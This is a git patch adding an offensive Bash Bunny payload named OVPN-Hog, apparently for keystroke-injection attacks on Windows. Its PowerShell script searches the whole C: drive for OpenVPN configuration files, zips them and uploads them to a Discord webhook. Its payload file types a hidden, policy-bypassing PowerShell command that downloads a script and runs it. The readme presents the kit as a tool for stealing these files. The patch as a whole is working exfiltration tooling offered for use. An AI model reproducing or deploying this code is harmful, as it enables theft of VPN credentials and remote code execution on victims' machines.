From 78bcc5dc7b301b93dfc75d5e237a93986d97f047 Mon Sep 17 00:00:00 2001
From: Gavin Kramer <75549184+atomiczsec@users.noreply.github.com>
Date: Fri, 14 Jul 2023 11:10:55 -0400
Subject: [PATCH] Add files via upload

---
 BashBunny/payloads/OVPN-Hog/o.ps1       | 46 +++++++++++++
 BashBunny/payloads/OVPN-Hog/payload.txt | 13 ++++
 BashBunny/payloads/OVPN-Hog/readme.md   | 87 +++++++++++++++++++++++++
 3 files changed, 146 insertions(+)
 create mode 100644 BashBunny/payloads/OVPN-Hog/o.ps1
 create mode 100644 BashBunny/payloads/OVPN-Hog/payload.txt
 create mode 100644 BashBunny/payloads/OVPN-Hog/readme.md

diff --git a/BashBunny/payloads/OVPN-Hog/o.ps1 b/BashBunny/payloads/OVPN-Hog/o.ps1
new file mode 100644
index 0000000..b700227
--- /dev/null
+++ b/BashBunny/payloads/OVPN-Hog/o.ps1
@@ -0,0 +1,46 @@
+function OVPN-Hog {
+    [CmdletBinding()]
+    param (
+        [parameter(Position=0,Mandatory=$False)]
+        [string]$file,
+        [parameter(Position=1,Mandatory=$False)]
+        [string]$text 
+    )
+
+    $hookurl = 'DISCORD-WEBHOOK'
+
+    $Body = @{
+        'username' = $env:username
+        'content' = $text
+    }
+
+    if (-not ([string]::IsNullOrEmpty($text))) {
+        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
+    }
+
+    if (-not ([string]::IsNullOrEmpty($file))) {
+        curl.exe -F "file1=@$file" $hookurl
+    }
+}
+
+$Drive = "C:"
+
+$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
+
+if ($Files) {
+    $types = @{
+        "*.ovpn" = "OpenVPN"
+    }
+
+    foreach ($type in $types.Keys) {
+        $filteredFiles = $Files | Where-Object { $_.Name -like $type }
+
+        if ($filteredFiles) {
+            $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
+
+            $filteredFiles | Compress-Archive -DestinationPath $zipFile
+
+            OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
+        }
+    }
+}
diff --git a/BashBunny/payloads/OVPN-Hog/payload.txt b/BashBunny/payloads/OVPN-Hog/payload.txt
new file mode 100644
index 0000000..aac697b
--- /dev/null
+++ b/BashBunny/payloads/OVPN-Hog/payload.txt
@@ -0,0 +1,13 @@
+REM     Title: Doc-Hog
+REM     Author: atomiczsec
+REM     Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
+
+
+REM     Target: Windows 10
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
+QUACK ENTER
+REM     Remember to replace the link with your DropBox shared link for the intended file to download
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/BashBunny/payloads/OVPN-Hog/readme.md b/BashBunny/payloads/OVPN-Hog/readme.md
new file mode 100644
index 0000000..6df607d
--- /dev/null
+++ b/BashBunny/payloads/OVPN-Hog/readme.md
@@ -0,0 +1,87 @@
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#Getting-Started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# OVPN-Hog
+
+A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).
+
+## Description
+
+This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<div align="center">
+  <a href="https://lnk.bio/atomiczsec">
+    <img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
+  </a>
+</div>
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
\ No newline at end of file